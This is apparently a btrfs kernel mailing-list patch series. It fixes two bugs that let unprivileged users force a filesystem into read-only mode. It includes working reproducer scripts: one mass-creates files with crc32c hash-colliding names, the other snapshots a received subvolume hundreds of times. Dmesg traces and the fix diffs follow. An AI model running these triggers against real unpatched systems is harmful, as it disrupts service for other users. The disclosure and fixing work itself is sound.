* [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
@ 2026-02-26 14:33 fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
` (6 more replies)
0 siblings, 7 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We have a couple of scenarios that regular users can exploit to trigger a
transaction abort and turn a filesystem into RO mode, causing some
disruption. The first 2 patches fix these, the remainder are just a few
trivial cleanups.
Filipe Manana (5):
btrfs: fix transaction abort on file creation due to name hash collision
btrfs: fix transaction abort when snapshotting received subvolumes
btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
btrfs: remove pointless error check in btrfs_check_dir_item_collision()
fs/btrfs/dir-item.c | 4 +---
fs/btrfs/inode.c | 19 +++++++++++++++++++
fs/btrfs/ioctl.c | 2 +-
fs/btrfs/transaction.c | 18 +++++++++++++++++-
fs/btrfs/uuid-tree.c | 5 +----
5 files changed, 39 insertions(+), 9 deletions(-)
--
2.47.2
* [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
@ 2026-02-26 14:33 ` fdmanana
2026-02-26 18:55 ` Boris Burkov
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
` (5 subsequent siblings)
6 siblings, 1 reply; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
If we attempt to create several files with names that result in the same
hash, we have to pack them in the same dir item, and that has a limit
inherent to the leaf size. However, if we reach that limit, we trigger a
transaction abort and turn the filesystem into RO mode. This allows a
malicious user to disrupt a system without needing administration
privileges/capabilities.
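As an illustration only (not part of the patch), the sketch below computes a
name hash in plain bash so that colliding names can be checked by hand. It
assumes that btrfs hashes directory entry names with a raw CRC-32C update
(no final inversion) seeded with (u32)~1, which is my reading of
btrfs_name_hash() and is not stated in this thread. The function names are
hypothetical and only ASCII names are handled.

```shell
#!/bin/bash

# Raw CRC-32C (Castagnoli, reflected polynomial 0x82F63B78) update,
# computed bit by bit, with no final inversion.
# $1 = seed, $2 = ASCII string. Prints the result in decimal.
crc32c_raw() {
    local crc=$(( $1 )) data=$2 i j byte
    for ((i = 0; i < ${#data}; i++)); do
        # Convert the current character to its numeric code.
        printf -v byte '%d' "'${data:i:1}"
        crc=$(( crc ^ byte ))
        for ((j = 0; j < 8; j++)); do
            if (( crc & 1 )); then
                crc=$(( (crc >> 1) ^ 0x82F63B78 ))
            else
                crc=$(( crc >> 1 ))
            fi
        done
    done
    echo "$crc"
}

# Assumption: the seed is (u32)~1 == 0xFFFFFFFE.
# Prints the hash as 8 hex digits.
btrfs_name_hash() {
    printf '%08x\n' "$(crc32c_raw 0xFFFFFFFE "$1")"
}

# Two names taken from the reproducer's list.
btrfs_name_hash 'foobar'
btrfs_name_hash 'Ono7avN5GjC:_6dBJ_'
```

If the assumption about the seed holds and the names were copied intact, the
two printed values should be identical. A bitwise loop is slow, but it keeps
the sketch free of external tools.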
Reproducer:
$ cat exploit-hash-collisions.sh
#!/bin/bash
DEV=/dev/sdi
MNT=/mnt/sdi
# Use the smallest node size to make the test faster and require fewer
# file names that result in a hash collision.
mkfs.btrfs -f --nodesize 4K $DEV
mount $DEV $MNT
# List of names that result in the same crc32c hash for btrfs.
declare -a names=(
'foobar'
'%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:'
'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
'Ono7avN5GjC:_6dBJ_'
'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
'8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
'9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
)
# Now create files with all those names in the same parent directory.
# It should not fail since a 4K leaf has enough space for them.
for name in "${names[@]}"; do
touch $MNT/$name
done
# Now add one more file name that causes a crc32c hash collision.
# This should fail, but it should not turn the filesystem into RO mode
# (which could be exploited by malicious users) due to a transaction
# abort.
touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
# Check that we are able to create another file, with a name that does not cause
# a crc32c hash collision.
echo -n "hello world" > $MNT/baz
# Unmount and mount again, verify file baz exists and with the right content.
umount $MNT
mount $DEV $MNT
echo "File baz content: $(cat $MNT/baz)"
umount $MNT
When running the reproducer:
$ ./exploit-hash-collisions.sh
(...)
touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
cat: /mnt/sdi/baz: No such file or directory
File baz content:
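To make the read-only flip explicit in a script instead of inferring it from
the failed write, a helper along these lines could be used. This is a sketch
with hypothetical function names; it assumes that a forced read-only btrfs
filesystem is reported with the "ro" option in /proc/mounts.

```shell
#!/bin/bash

# Succeeds (exit 0) if a comma-separated mount option string contains "ro".
opts_are_readonly() {
    case ",$1," in
        *,ro,*) return 0 ;;
        *) return 1 ;;
    esac
}

# Looks up a mount point in /proc/mounts, whose fields are:
# device, mount point, fs type, options, dump, pass.
# Returns 0 if mounted read-only, 1 if read-write, 2 if not mounted.
mount_is_readonly() {
    local dev mnt type opts rest
    while read -r dev mnt type opts rest; do
        if [ "$mnt" = "$1" ]; then
            opts_are_readonly "$opts"
            return
        fi
    done < /proc/mounts
    return 2
}
```

In the reproducer this could be called right after the failing touch, for
example: mount_is_readonly "$MNT" && echo "filesystem was forced read-only".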
And the transaction abort stack trace in dmesg/syslog:
$ dmesg
(...)
[758240.509761] ------------[ cut here ]------------
[758240.510668] BTRFS: Transaction aborted (error -75)
[758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
[758240.513513] Modules linked in: btrfs dm_zero (...)
[758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
[758240.524621] Tainted: [W]=WARN
[758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
[758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
[758240.527093] Code: 0f 82 cf (...)
[758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
[758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
[758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
[758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
[758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
[758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
[758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
[758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
[758240.537517] Call Trace:
[758240.537828] <TASK>
[758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
[758240.538760] path_openat+0x111a/0x15b0
[758240.539252] do_filp_open+0xc2/0x170
[758240.539699] ? preempt_count_add+0x47/0xa0
[758240.540200] ? __virt_addr_valid+0xe4/0x1a0
[758240.540800] ? __check_object_size+0x1b3/0x230
[758240.541661] ? alloc_fd+0x118/0x180
[758240.542315] do_sys_openat2+0x70/0xd0
[758240.543012] __x64_sys_openat+0x50/0xa0
[758240.543723] do_syscall_64+0x50/0xf20
[758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[758240.545397] RIP: 0033:0x7f1959abc687
[758240.546019] Code: 48 89 fa (...)
[758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
[758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
[758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
[758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
[758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
[758240.570758] </TASK>
[758240.571040] ---[ end trace 0000000000000000 ]---
[758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
[758240.572899] BTRFS info (device sdi state EA): forced readonly
Fix this by checking for a hash collision, and whether adding the new name
is still possible, early in btrfs_create_new_inode(), before we do any tree
updates, so that we don't need to abort the transaction if we cannot add
the new name due to the leaf size limit.
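The size check behind that early test can be sketched as simple arithmetic.
The sketch below is an illustration under assumptions, not the kernel code:
the structure sizes (101 bytes for the leaf header, 25 bytes for an item
header, 30 bytes for a dir item without its name) come from my reading of the
on-disk format and are not stated in this thread, and the function name is
hypothetical. It only models the case where a dir item with the same hash
already exists.

```shell
#!/bin/bash

# Assumed on-disk sizes in bytes (not taken from this thread).
HEADER_SIZE=101    # struct btrfs_header
ITEM_SIZE=25       # struct btrfs_item
DIR_ITEM_SIZE=30   # struct btrfs_dir_item, excluding the name

# $1 = node size in bytes
# $2 = current size of the existing dir item for this hash
# $3 = length of the new name
# Exit status 0 if the new name still fits, 1 if it would overflow.
name_fits_in_dir_item() {
    local leaf_data=$(( $1 - HEADER_SIZE ))
    local needed=$(( DIR_ITEM_SIZE + $3 + $2 + ITEM_SIZE ))
    (( needed <= leaf_data ))
}

# Example: a 50 character name against a nearly full item on a 4K leaf.
if name_fits_in_dir_item 4096 3950 50; then
    echo "name fits"
else
    echo "name would overflow the dir item"
fi
```

Doing this check before any tree modification is what lets the caller return
an error to user space without having to abort the transaction.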
A test case for fstests will be sent soon.
Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/inode.c | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
index b9f1bd18ea62..9a26fc5a5263 100644
--- a/fs/btrfs/inode.c
+++ b/fs/btrfs/inode.c
@@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
int ret;
bool xa_reserved = false;
+ if (!args->orphan && !args->subvol) {
+ /*
+ * Before anything else, check if we can add the name to the
+ * parent directory. We want to avoid a dir item overflow in
+ * case we have an existing dir item due to existing name
+ * hash collisions. We do this check here before we call
+ * btrfs_add_link() down below so that we can avoid a
+ * transaction abort (which could be exploited by malicious
+ * users).
+ *
+ * For subvolumes we already do this in btrfs_mksubvol().
+ */
+ ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
+ btrfs_ino(BTRFS_I(dir)),
+ name);
+ if (ret < 0)
+ return ret;
+ }
+
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
--
2.47.2
* [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
@ 2026-02-26 14:33 ` fdmanana
2026-02-26 20:40 ` Qu Wenruo
2026-02-26 14:34 ` [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add() fdmanana
` (4 subsequent siblings)
6 siblings, 1 reply; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
Currently a user can trigger a transaction abort by snapshotting a
previously received snapshot a bunch of times until we reach a
BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
can store in a leaf). This is very likely not common in practice, but
if it happens, it turns the filesystem into RO mode. The snapshot, send,
set_received_subvol and subvol_setflags operations (used by receive) don't
require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
could use this to turn a filesystem into RO mode and disrupt a system.
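A rough estimate of how many snapshots it takes to hit the limit can be
worked out as below. This is a sketch under assumptions that are not stated
in this thread: a 101 byte leaf header, a 25 byte item header, and one 8 byte
subvolume ID per entry in the BTRFS_UUID_KEY_RECEIVED_SUBVOL item. The
function name is hypothetical.

```shell
#!/bin/bash

# $1 = node size in bytes.
# Prints how many 8 byte subvolume IDs fit in a single item, assuming
# max item size = node size - leaf header (101) - item header (25).
max_uuid_item_entries() {
    local max_item=$(( $1 - 101 - 25 ))
    echo $(( max_item / 8 ))
}

max_uuid_item_entries 4096    # prints 496
```

With a 4K node size this gives 496 entries. If the received subvolume itself
occupies one entry, 495 snapshots would succeed and the 496th would overflow,
which appears consistent with the reproducer output in this message, where
snapshot 496 is the first one to fail.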
Reproducer script:
$ cat test.sh
#!/bin/bash
DEV=/dev/sdi
MNT=/mnt/sdi
# Use smallest node size to make the test faster.
mkfs.btrfs -f --nodesize 4K $DEV
mount $DEV $MNT
# Create a subvolume and set it to RO so that it can be used for send.
btrfs subvolume create $MNT/sv
touch $MNT/sv/foo
btrfs property set $MNT/sv ro true
# Send and receive the subvolume into snaps/sv.
mkdir $MNT/snaps
btrfs send $MNT/sv | btrfs receive $MNT/snaps
# Now snapshot the received subvolume, which has a received_uuid, a
# lot of times to trigger the leaf overflow.
total=500
for ((i = 1; i <= $total; i++)); do
echo -ne "\rCreating snapshot $i/$total"
btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
done
echo
umount $MNT
When running the test:
$ ./test.sh
(...)
Create subvolume '/mnt/sdi/sv'
At subvol /mnt/sdi/sv
At subvol sv
Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
And in dmesg/syslog:
$ dmesg
(...)
[251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
[251067.629212] ------------[ cut here ]------------
[251067.630033] BTRFS: Transaction aborted (error -75)
[251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
[251067.632851] Modules linked in: btrfs dm_zero (...)
[251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
[251067.646165] Tainted: [W]=WARN
[251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
[251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
[251067.649984] Code: f0 48 0f (...)
[251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
[251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
[251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
[251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
[251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
[251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
[251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
[251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
[251067.661972] Call Trace:
[251067.662292] <TASK>
[251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
[251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
[251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
[251067.665238] ? _raw_spin_unlock+0x15/0x30
[251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
[251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
[251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
[251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
[251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
[251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
[251067.670093] ? count_memcg_events+0x6d/0x180
[251067.670849] ? handle_mm_fault+0x1a0/0x2a0
[251067.671652] __x64_sys_ioctl+0x92/0xe0
[251067.672406] do_syscall_64+0x50/0xf20
[251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[251067.674096] RIP: 0033:0x7f2a495648db
[251067.674812] Code: 00 48 89 (...)
[251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
[251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
[251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
[251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
[251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
[251067.686524] </TASK>
[251067.686972] ---[ end trace 0000000000000000 ]---
[251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
[251067.689049] BTRFS info (device sdi state EA): forced readonly
[251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
[251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
[251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
snapshot creation code when attempting to add the
BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
and we are still able to delete the snapshot, as snapshot/subvolume
deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
send/receive operations since it always picks the first root ID in the
existing BTRFS_UUID_KEY_RECEIVED_SUBVOL item (it could pick any since all
snapshots have the same content), and even if the key is missing, it
falls back to searching by BTRFS_UUID_KEY_SUBVOL key.
A test case for fstests will be sent soon.
Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/transaction.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
index 3112bd5520b7..1a0daf2c68fb 100644
--- a/fs/btrfs/transaction.c
+++ b/fs/btrfs/transaction.c
@@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
BTRFS_UUID_KEY_RECEIVED_SUBVOL,
objectid);
+ /*
+ * We are creating a lot of snapshots of the same root that was
+ * received (has a received UUID) and reached a leaf's limit for
+ * an item. We can safely ignore this and avoid a transaction
+ * abort. A deletion of this snapshot will still work since we
+ * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
+ * is missing (see btrfs_delete_subvolume()). Send/receive will
+ * work too since it picks the first root id from the existing
+ * item (it could pick any), and in case it's missing it
+ * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
+ * Creation of a snapshot does not require CAP_SYS_ADMIN, so
+ * we don't want users triggering transaction aborts, either
+ * intentionally or not.
+ */
+ if (ret == -EOVERFLOW)
+ ret = 0;
if (unlikely(ret && ret != -EEXIST)) {
btrfs_abort_transaction(trans, ret);
goto fail;
--
2.47.2
* [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 14:34 ` [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add() fdmanana
` (3 subsequent siblings)
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We never return -EEXIST from btrfs_uuid_tree_add(): if the item already
exists we extend it, so it's pointless to check for such a return value.
Furthermore, in create_pending_snapshot(), the logic is completely broken.
The goal was to not error out and abort the transaction in case of -EEXIST
but we left 'ret' with the -EEXIST value, so we end up setting
pending->error to -EEXIST and return that error up the call chain up to
btrfs_commit_transaction(), which will abort the transaction.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/ioctl.c | 2 +-
fs/btrfs/transaction.c | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
index b8db877be61c..e5cff9c0616d 100644
--- a/fs/btrfs/ioctl.c
+++ b/fs/btrfs/ioctl.c
@@ -3974,7 +3974,7 @@ static long _btrfs_ioctl_set_received_subvol(struct file *file,
ret = btrfs_uuid_tree_add(trans, sa->uuid,
BTRFS_UUID_KEY_RECEIVED_SUBVOL,
btrfs_root_id(root));
- if (unlikely(ret < 0 && ret != -EEXIST)) {
+ if (unlikely(ret < 0)) {
btrfs_abort_transaction(trans, ret);
btrfs_end_transaction(trans);
goto out;
diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
index 1a0daf2c68fb..c6a2328b6a22 100644
--- a/fs/btrfs/transaction.c
+++ b/fs/btrfs/transaction.c
@@ -1918,7 +1918,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
*/
if (ret == -EOVERFLOW)
ret = 0;
- if (unlikely(ret && ret != -EEXIST)) {
+ if (unlikely(ret)) {
btrfs_abort_transaction(trans, ret);
goto fail;
}
--
2.47.2
* [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (2 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add() fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 14:34 ` [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision() fdmanana
` (2 subsequent siblings)
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
There's no point in checking if the uuid root exists in
btrfs_uuid_tree_add(), since we already do it in btrfs_uuid_tree_lookup().
We can just remove the check from btrfs_uuid_tree_add() and make
btrfs_uuid_tree_lookup() return -EINVAL instead of -ENOENT in case the
uuid tree does not exist.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
